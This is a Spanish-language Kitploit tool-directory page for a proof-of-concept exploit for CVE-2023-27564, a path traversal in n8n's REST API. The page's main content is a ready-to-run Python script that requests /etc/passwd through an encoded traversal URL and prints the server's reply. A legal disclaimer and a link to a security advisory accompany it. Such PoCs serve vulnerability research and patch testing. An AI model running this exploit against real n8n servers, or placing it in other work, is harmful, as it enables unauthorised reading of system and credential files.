Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
exploit-CVE-2023-27564 — Exploit de prueba de concepto para CVE-2023-27564 que permite la lectura anónima de archivos en n8n mediante path traversal en la REST API. Destinado a la investigación de seguridad y evaluación de vulnerabilidades. | Kitploit
Herramientas/GitHubGitHub/david-botelho-mariano/exploit-cve-2023-27564
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubdavid-botelho-mariano/exploit-cve-2023-27564

exploit-CVE-2023-27564

Exploit de prueba de concepto para CVE-2023-27564 que permite la lectura anónima de archivos en n8n mediante path traversal en la REST API. Destinado a la investigación de seguridad y evaluación de vulnerabilidades.

Ver Repositorio
1hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit para CVE-2023-27564

Esta vulnerabilidad permite la lectura anónima de archivos en n8n.

root@kitploit:~
import requests

url = "https://example.com/rest/data/filesystem:..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd:.svg"

response = requests.get(url)

print(response.status_code)
print(response.headers)
print(response.text)

Fuente

https://www.synacktiv.com/sites/default/files/2023-05/Synacktiv-N8N-Multiple-Vulnerabilities_0.pdf

Aviso legal

El PoC (Prueba de Concepto) proporcionado en este repositorio es únicamente con fines educativos y de investigación en seguridad. La información y el código están destinados a ser utilizados por profesionales de la ciberseguridad e investigadores para comprender y protegerse contra vulnerabilidades en software y sistemas. Cualquier uso de este PoC, la información relacionada o el código para atacar objetivos sin el consentimiento mutuo previo es ilegal y está estrictamente prohibido.

Al utilizar este PoC, usted acepta que comprende el impacto potencial de la vulnerabilidad que demuestra y que lo utilizará de manera responsable y ética. Los autores de este PoC renuncian a toda responsabilidad por cualquier uso indebido de este material o por cualquier daño que pueda ocurrir por el uso de la información y el código proporcionados. Es responsabilidad del usuario final cumplir con todas las leyes locales, estatales, nacionales e internacionales aplicables.

Los autores han hecho todo lo posible para garantizar la precisión y confiabilidad de la información proporcionada en este repositorio. Sin embargo, la información se proporciona "tal cual", sin garantía de ningún tipo. Los autores no aceptan ninguna responsabilidad u obligación por la exactitud, el contenido, la integridad, la legalidad o la confiabilidad de la información contenida.

Descargar herramienta